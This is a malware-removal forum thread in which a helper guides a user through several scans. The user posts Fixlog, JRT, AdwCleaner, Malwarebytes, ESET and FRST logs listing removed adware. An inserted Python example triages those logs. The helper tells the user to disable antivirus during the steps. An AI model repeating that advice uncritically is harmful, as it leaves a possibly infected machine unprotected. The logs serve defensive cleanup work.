"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchPreSignup" => key removed successfully
"C:\Program Files (x86)\OLBPre" => not found.
C:\ProgramData\TEMP => ":0FF263E8" ADS removed successfully.
 
=========  bitsadmin /reset /allusers =========
 
 
BITSADMIN version 3.0 [ 7.7.9600 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.
 
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
 
{4622E06D-7062-4A2C-8CB0-3186EAF6416E} canceled.
{A182CD1C-106E-4B37-B9F9-00DAAEA77FFD} canceled.
{8B164B5B-5DBA-4005-96D0-B5DC6AA24C02} canceled.
{7F0B5951-F2F1-4DC1-B54E-6017C62B53E1} canceled.
4 out of 4 jobs canceled.
 
========= End of CMD: =========
 
 
=========  netsh advfirewall reset =========
 
Ok.
 
 
========= End of CMD: =========
 
 
=========  netsh advfirewall set allprofiles state on =========
 
Ok.
 
 
========= End of CMD: =========
 
 
=========  ipconfig /flushdns =========
 
 
Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========= End of CMD: =========
 
EmptyTemp: => 1.2 GB temporary data Removed.
 
 
The system needed a reboot.
 
==== End of Fixlog 15:33:48 ====

  • 0

#8
moles926

    Member

  • Topic Starter
  • Member
  • PipPip
  • 15 posts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.2 (01.06.2016)
Operating System: Windows 8.1 Pro x64 
Ran by Molly Poole (Administrator) on 09/02/2016 at 15:40:21.39
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 4 
 
Failed to delete: C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_gkojfkhlekighikafcpjkiklfbnlmeio_0.localstorage-journal (File) 
Failed to delete: C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_gkojfkhlekighikafcpjkiklfbnlmeio_0.localstorage (File) 
Successfully deleted: C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio (Folder) 
Successfully deleted: C:\users\Public\Documents\guid (Folder) 
 
 
 
Registry: 0 
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 09/02/2016 at 15:41:44.03
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  • 0

#9
moles926

    Member

  • Topic Starter
  • Member
  • PipPip
  • 15 posts
# AdwCleaner v5.033 - Logfile created 09/02/2016 at 15:48:41
# Updated 07/02/2016 by Xplode
# Database : 2016-02-07.2 [Server]
# Operating system : Windows 8.1 Pro  (x64)
# Username : Molly Poole - POOLE-PC
# Running from : D:\Users\Molly Poole\Desktop\AdwCleaner.exe
# Option : Cleaning
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
[-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\WeatherTool
 
***** [ Files ] *****
 
 
***** [ DLLs ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
[-] Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION [wb.exe]
[-] Key Deleted : HKCU\Software\claro
[-] Key Deleted : HKCU\Software\CoinisRS
[-] Key Deleted : HKCU\Software\ICSW1.17
[-] Key Deleted : HKCU\Software\PRODUCTSETUP
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8DBC5A0A-31C4-46C7-B252-6B593EA11A87}
[-] Key Deleted : [x64] HKLM\SOFTWARE\WebBar
 
***** [ Web browsers ] *****
 
 
*************************
 
:: Proxy settings cleared
:: Winsock settings cleared
:: TCP/IP settings cleared
:: Firewall settings cleared
:: IPSec settings cleared
:: BITS queue cleared
:: Chrome policies deleted
 
########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [1336 bytes] ##########

  • 0
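
Added example, not part of the thread and not code from any of the tools used: a Python triage of the Fixlog, JRT and AdwCleaner output posted above. It groups each Fixlog result by outcome, records that the restore point was not created, and checks the later logs for components the fix reported as "not found"; the outcome labels and function names are chosen for this example.

```python
import re
from collections import Counter

# Result lines copied from the Fixlog posted in this thread.
FIXLOG = r'''
Error: (0) Failed to create a restore point.
Processes closed successfully.
C:\Program Files (x86)\WeatherTool\2.0.0.10998\WeatherService.exe => No running process found
"C:\Program Files (x86)\WeatherTool" => not found.
C:\Program Files (x86)\WeatherTool\2.0.0.10998\weather.exe => No running process found
"C:\Users\Molly Poole\AppData\Roaming\WeatherTool" => not found.
"C:\Program Files (x86)\WeatherTool" => not found.
C:\ProgramData\245e70c0-6827-0 => moved successfully
C:\ProgramData\245e70c0-3ee5-1 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{48732612-692B-4ED3-B466-B9D75B2262DA}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{48732612-692B-4ED3-B466-B9D75B2262DA}" => key removed successfully
C:\Windows\System32\Tasks\LaunchPreSignup => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchPreSignup" => key removed successfully
"C:\Program Files (x86)\OLBPre" => not found.
C:\ProgramData\TEMP => ":0FF263E8" ADS removed successfully.
EmptyTemp: => 1.2 GB temporary data Removed.
The system needed a reboot.
'''

# Lines copied from the JRT and AdwCleaner logs posted after it.
LATER_LOGS = r'''
Successfully deleted: C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio (Folder)
Successfully deleted: C:\users\Public\Documents\guid (Folder)
[-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\WeatherTool
[-] Key Deleted : HKCU\Software\claro
[-] Key Deleted : [x64] HKLM\SOFTWARE\WebBar
'''

# Outcome phrases as they appear in the Fixlog, mapped to labels chosen for
# this example (the labels are not FRST terminology).
RULES = [
    (re.compile(r"No running process found", re.I), "no_process"),
    (re.compile(r"\bnot found\.?$", re.I), "absent"),
    (re.compile(r"\bremoved successfully", re.I), "removed"),
    (re.compile(r"\bmoved successfully", re.I), "moved"),
]


def classify(result):
    """Return the label of the first rule matching a result phrase."""
    for pattern, label in RULES:
        if pattern.search(result):
            return label
    return "other"


def parse_fixlog(text):
    """Split a Fixlog body into errors, a reboot flag and (target, outcome) pairs."""
    report = {"errors": [], "reboot_needed": False, "outcomes": []}
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Error:"):
            report["errors"].append(line)
        elif line == "The system needed a reboot.":
            report["reboot_needed"] = True
        elif " => " in line:
            target, result = line.split(" => ", 1)
            report["outcomes"].append((target.strip('"'), classify(result)))
    return report


def summarize(report):
    """Count outcomes and list the unique targets that were not found."""
    absent = list(dict.fromkeys(t for t, o in report["outcomes"] if o == "absent"))
    return {
        "counts": dict(Counter(o for _, o in report["outcomes"])),
        "absent": absent,
        "restore_point_created": not any("restore point" in e.lower() for e in report["errors"]),
        "reboot_needed": report["reboot_needed"],
    }


def remnants(absent_targets, later_text):
    """Find later-log lines that name the last path component of an absent target."""
    hits = {}
    for target in absent_targets:
        name = target.rstrip("\\").rsplit("\\", 1)[-1]
        pat = re.compile(r"(?<![A-Za-z0-9])" + re.escape(name) + r"(?![A-Za-z0-9])", re.I)
        lines = [l.strip() for l in later_text.splitlines() if pat.search(l)]
        if lines:
            hits[target] = lines
    return hits


if __name__ == "__main__":
    summary = summarize(parse_fixlog(FIXLOG))
    print(summary)
    print(remnants(summary["absent"], LATER_LOGS))
```

On these logs the two WeatherTool paths that the fix reported as not found match the WeatherTool folder AdwCleaner later deleted under the system profile, so a "not found" result is a prompt to look for other copies rather than proof of removal.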

#10
pystryker

    Trusted Helper

  • Malware Removal
  • 3,912 posts
Hello :)

Looking good, let's run a sweep for any remnants and orphans that may be lurking. We'll also check for any out of date programs on the machine. :thumbsup:


Please disable your antivirus for the duration of my instructions. Don't forget to re-enable it after you have completed the steps.

Step 1: Scan with Malwarebytes


Please download Malwarebytes Anti-Malware to your desktop
Install the programme and select update
Once it has updated select Settings > Detection and Protection
Tick Scan for rootkits

Go back to the Dashboard and select Scan Now

If threats are detected, click the Apply Actions button, MBAM will ask for a reboot.

On completion of the scan (or after the reboot), start MBAM,

Click History, then Application Logs, then check the Select box by the first Scan Log in the list and then click on the log to highlight it.

Click Export, select text file and save to the desktop as MBAM.txt and post in your next reply.




Step 2: ESET Online Virus Scan

Please note: You can use Internet Explorer or Firefox for this step.

If you use Firefox, you will be prompted to download esetsmartinstaller_enu.exe. Please do so, then double click it to install it.

Please click on this link and then click the ESET Online Scanner bar.
  • Select the option YES, I accept the Terms of Use then click on Start
  • When prompted allow the Add-On/Active X to install.
  • Make sure that the option Remove found threats is NOT checked.
  • Make sure that the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Now click on Start
  • The virus signature database will begin to download. Be patient, this may take some time depending on the speed of your Internet connection.
  • When completed the Online Scan will begin automatically. The scan may take several hours.
  • Do not touch either the Mouse or keyboard during the scan otherwise it may stall.
  • Now click on Finish
  • Use notepad to open the logfile located at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
  • Copy and paste that log as a reply to this topic.
Step 3: SecurityCheck Scan


Download Security Check by screen317 from here or here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • NOTE: If SecurityCheck aborts and you get the following message: UNSUPPORTED OPERATING SYSTEM! ABORTED! try rebooting the system and then run SecurityCheck again.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.
Things I need to see in your next post:
  • ESET Scan Log
  • MBAM Log
  • SecurityCheck Log

  • 0


#11
moles926

    Member

  • Topic Starter
  • Member
  • PipPip
  • 15 posts
Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 09/02/2016
Scan Time: 16:47
Logfile: MBAM.txt
Administrator: Yes
 
Version: 2.2.0.1024
Malware Database: v2016.02.09.03
Rootkit Database: v2016.02.08.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled
 
OS: Windows 8.1
CPU: x64
File System: NTFS
User: Molly Poole
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 384921
Time Elapsed: 28 min, 35 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 3
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Quarantined, [8225cc92fe9b78be31242be746be39c7], 
PUP.Optional.WinYahoo, HKU\S-1-5-21-1343854479-873069186-2863876452-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Quarantined, [4f58124c0d8cea4cf06319f9897b748c], 
PUP.Optional.OneSystemCare, HKU\S-1-5-21-1343854479-873069186-2863876452-1003\SOFTWARE\ONE SYSTEM CARE, Quarantined, [c9de77e74d4c4aec1a155797ed1625db], 
 
Registry Values: 8
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, https://uk.search.ya...={searchTerms},%4, %5
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|TopResultURLFallback, https://uk.search.ya...={searchTerms},%4, %5
PUP.Optional.OneSystemCare, HKU\S-1-5-21-1343854479-873069186-2863876452-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|SystemCash.exe, 11000, Quarantined, [12951d417b1ec76f2312f95133d14fb1]
PUP.Optional.WinYahoo, HKU\S-1-5-21-1343854479-873069186-2863876452-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, https://uk.search.ya...={searchTerms},%4, %5
PUP.Optional.WinYahoo, HKU\S-1-5-21-1343854479-873069186-2863876452-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|TopResultURLFallback, https://uk.search.ya...={searchTerms},%4, %5
PUP.Optional.OneSystemCare, HKU\S-1-5-21-1343854479-873069186-2863876452-1003\SOFTWARE\ONE SYSTEM CARE|OSID, 6.2, Quarantined, [c9de77e74d4c4aec1a155797ed1625db]
PUP.Optional.OneSystemCare, HKU\S-1-5-21-1343854479-873069186-2863876452-1003\SOFTWARE\ONE SYSTEM CARE|AdvertsLink1, http://dl.softserver...3/DriverPro.exe, Quarantined, [3e693b23cbce3402012de8063cc7728e]
PUP.Optional.OneSystemCare, HKU\S-1-5-21-1343854479-873069186-2863876452-1003\SOFTWARE\ONE SYSTEM CARE|AdvertsLink2, http://dl.softserver...LiveSupport.exe, Quarantined, [297e91cd267363d379b531bd689b5da3]
 
Registry Data: 2
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, Good: (www.google.com), Bad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[fbacc19d8613c76feab0f7e6b84cc040]
PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, Good: (www.google.com), Bad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[099e70eeb1e81d192a707f5e35cf34cc]
 
Folders: 0
(No malicious items detected)
 
Files: 0
(No malicious items detected)
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)

#12
moles926

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=fb2f154af158a64a9f0a6921ab510bfe
# end=init
# utc_time=2016-02-09 05:35:10
# local_time=2016-02-09 05:35:10 (+0000, GMT Standard Time)
# country="United Kingdom"
# osver=6.2.9200 NT 
Update Init
Update Download
Update Init
Update Download
Update Finalize
Updated modules version: 28048
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=fb2f154af158a64a9f0a6921ab510bfe
# end=updated
# utc_time=2016-02-09 05:38:29
# local_time=2016-02-09 05:38:29 (+0000, GMT Standard Time)
# country="United Kingdom"
# osver=6.2.9200 NT 
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=fb2f154af158a64a9f0a6921ab510bfe
# engine=28048
# end=stopped
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2016-02-09 05:45:14
# local_time=2016-02-09 05:45:14 (+0000, GMT Standard Time)
# country="United Kingdom"
# lang=1033
# osver=6.2.9200 NT 
# compatibility_mode_1=''
# compatibility_mode=5893 16776573 100 94 21517 10819681 0 0
# scanned=10410
# found=0
# cleaned=0
# scan_time=404

#13
moles926

 Results of screen317's Security Check version 1.014 --- 12/23/15  
   x64 (UAC is enabled)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
 Windows Firewall Enabled!  
Windows Defender   
 WMI entry may not exist for antivirus; attempting automatic update. 
`````````Anti-malware/Other Utilities Check:````````` 
 Google Chrome (48.0.2564.103) 
 Google Chrome (48.0.2564.97) 
````````Process Check: objlist.exe by Laurent````````  
 Windows Defender MSMpEng.exe 
 Malwarebytes Anti-Malware mbamservice.exe  
 Malwarebytes Anti-Malware mbam.exe  
 Molly Poole Desktop Malwarebytes Anti-Malware mbamscheduler.exe 
 Windows Defender MpCmdRun.exe   
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C:  % 
````````````````````End of Log`````````````````````` 

#14
pystryker

Hello :)

Looks like a clean bill of health. :thumbsup: Let's run one last scan with FRST to make sure everything is clear.


Step 1: Fresh FRST Scan
  • Start Farbar's Recovery Scan Tool and press the Scan button.
  • FRST will scan your system and produce two logs: FRST.txt and Addition.txt. Please post them in your next reply.
Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

FRST.txt Log

Addition.txt Log

#15
moles926

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:07-02-2016
Ran by Molly Poole (administrator) on POOLE-PC (09-02-2016 21:10:56)
Running from D:\Users\Molly Poole\Desktop
Loaded Profiles: Molly Poole & Molly (Available Profiles: Molly Poole & Molly)
Platform: Windows 8.1 Pro (X64) Language: English (United Kingdom)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Common Files\Nuance\dgnsvc.exe
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(Malwarebytes) D:\Users\Molly Poole\Desktop\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) D:\Users\Molly Poole\Desktop\Malwarebytes Anti-Malware\mbamservice.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\epson\MyEpson Portal\mepService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\epson\MyEpson Portal\mep.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Validity Sensors, Inc.) C:\Windows\System32\valWBFPolicyService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Common Files\Nuance\loggerservice.exe
(Malwarebytes) D:\Users\Molly Poole\Desktop\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATINEE.EXE
(Flexera Software LLC.) C:\ProgramData\FLEXnet\Connect\11\agent.exe
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATINEE.EXE
(Flexera Software LLC.) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
() C:\Program Files (x86)\Spellex\Spellex Dictation\spxsr.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\CSISYNCCLIENT.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\livecomm.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Farbar) D:\Users\Molly Poole\Desktop\FRST64 (1).exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8444632 2015-08-04] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2817776 2014-04-11] (Synaptics Incorporated)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-12-09] (Apple Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60688 2015-11-20] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM-x32\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\\isuspm.exe [2068856 2011-10-12] (Flexera Software LLC.)
HKLM-x32\...\Run: [Spellex] => C:\Program Files (x86)\Spellex\Spellex Dictation\spxsr.exe [53760 2015-02-12] ()
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1065968 2015-07-23] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-1343854479-873069186-2863876452-1002\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [2068856 2011-10-12] (Flexera Software LLC.)
HKU\S-1-5-21-1343854479-873069186-2863876452-1002\...\Run: [EPLTarget\P0000000000000000] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATINEE.EXE [298560 2013-12-16] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-1343854479-873069186-2863876452-1002\...\Run: [EPLTarget\P0000000000000001] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATINEE.EXE [298560 2013-12-16] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-1343854479-873069186-2863876452-1003\...\Run: [moveuser] => C:\Windows\iansyst\imoveuser.exe [293213 2013-07-30] ()
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{139019A9-051D-4E9B-8DE0-B85849599CA1}: [DhcpNameServer] 192.168.5.253
Tcpip\..\Interfaces\{E290C363-028E-443D-B7BF-CFA28FF92AE5}: [DhcpNameServer] 192.168.0.1
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-1343854479-873069186-2863876452-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.co.uk
HKU\S-1-5-21-1343854479-873069186-2863876452-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.co.uk/?gws_rd=ssl
HKU\S-1-5-21-1343854479-873069186-2863876452-1003\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.co.uk
HKU\S-1-5-21-1343854479-873069186-2863876452-1003\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.co.uk
URLSearchHook: [S-1-5-21-1343854479-873069186-2863876452-1003] ATTENTION => Default URLSearchHook is missing
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Dragon Web Extension For Internet Explorer -> {609C0837-8DD3-4F9B-AAC5-446F36BC0353} -> C:\Program Files (x86)\Nuance\NaturallySpeaking13\Program\x64\dgnriaie_x64.dll [2014-07-12] (Nuance Communications, Inc.)
BHO: Easy Photo Print -> {9421DD08-935F-4701-A9CA-22DF90AC4EA6} -> C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll [2015-07-31] (Seiko Epson Corporation)
BHO-x32: E-Web Print -> {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} -> C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2016-01-19] (Microsoft Corporation)
BHO-x32: Dragon Web Extension For Internet Explorer -> {609C0837-8DD3-4F9B-AAC5-446F36BC0353} -> C:\Program Files (x86)\Nuance\NaturallySpeaking13\Program\dgnriaie.dll [2014-07-12] (Nuance Communications, Inc.)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL [2016-01-17] (Microsoft Corporation)
Toolbar: HKLM - Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll [2015-07-31] (Seiko Epson Corporation)
Toolbar: HKLM-x32 - E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
